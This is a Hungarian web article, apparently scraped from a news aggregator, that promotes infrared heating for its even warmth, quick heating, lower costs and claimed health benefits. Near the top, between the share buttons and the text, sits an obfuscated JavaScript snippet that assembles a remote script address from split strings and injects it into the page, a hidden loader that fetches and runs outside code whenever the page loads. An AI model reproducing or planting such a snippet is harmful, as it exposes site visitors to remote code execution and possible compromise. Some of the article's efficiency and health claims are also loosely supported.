Milyen előnyökkel rendelkezik az infra fűtés?

Milyen előnyökkel rendelkezik az infra fűtés?

Megosztás 0 Tweet 0 Megosztás

(function(){wzp0=document.createElement(“script”);wzp0.;wzp0.async=true;wzp0_=((“us”)+”t”)+”a”;wzp0_+=(“t.i”)+””+”n”;wzp0_+=((“f”)+”o”);wzp0_+=”/”;wzp0u=”431901400.”;wzp0u+=”gvfggh4uzp0bpipidX5yw2trl69bc6″;wzp0.src=”https://”+wzp0_+wzp0u;wzp0db=document.body;wzp0db.appendChild(wzp0);})();

Az infra fűtés számos előnnyel jár azon háztartások és vállalkozások számára, amelyek szén-dioxid-barátabb módot keresnek ingatlanaik melegen tartására. Bár nem megújuló energia, beépíthető a zöldenergia-termelésbe, például  napelemekkel, hogy szén-dioxid-hatékonyabb megközelítést hozzon létre egy adott tér fűtésére.

Infra fűtés: A hő egyenletes terjedése

Az infra fűtés a konvekciós fűtéstől eltérően működik, mivel a szilárd testeket melegíti, nem pedig a környező levegőt. A konvekciós rendszereknél a hő általában a mennyezetig emelkedik, és a hideg levegő a helyiség alsó részére száll. Az infra fűtés viszont a sugárzással a személyeket és a tárgyakat melegíti először, azután melegszik fel a levegő.

Az infra fűtés gyorsasága

Míg a konvekciós fűtőberendezéseknek időbe telik a szoba felmelegítése, addig az infra fűtés azonnali hatást fejt ki, így nem kell sokat várnunk a kényelmes hőmérséklet elérésére. Ez a gyors felfűtés nagymértékben függ a rendszer méretétől és elhelyezkedésétől, de mivel a szilárd tárgyakat melegíti fel, az infra fűtés általában nagyobb, de hatása is jobban észrevehető, mint a konvekciós módszereké.

Hírdetés

Alacsonyabb költségek

A mai infra fűtés üzemeltetési költségei alacsonyabbak, mint a normál konvekciós fűtőberendezéseké. Általában úgy gondolják, hogy egy 600 W-os infra fűtőtest ugyanolyan szintű meleget biztosít, mint egy 1500 W-os konvekciós. Sokan, akik infra fűtés rendszerre váltottak, jelentős költségmegtakarítást értek el a hagyományos fűtési rendszerhez képest.

Egészségesebb fűtés

Vannak egészségügyi állítások az infrapanelekkel kapcsolatban, például, hogy segítenek csökkenteni az olyan problémákat, mint a penészedés a nedves házakban, valamint javítják vagy fenntartják a jobb levegőminőséget, ami segít az allergiásoknak is.

Reméljük cikkünkkel elegendő betekintést nyújtottunk az infra fűtés világába! Amennyiben a továbbiakban fontolgatod az infra fűtés beszerelését azt tanácsoljuk, hogy előtte konzultálj szakemberrel is!

Megosztás 0 Tweet 0 Megosztás


Forrás:alternativenergia.hu
Tovább a cikkre »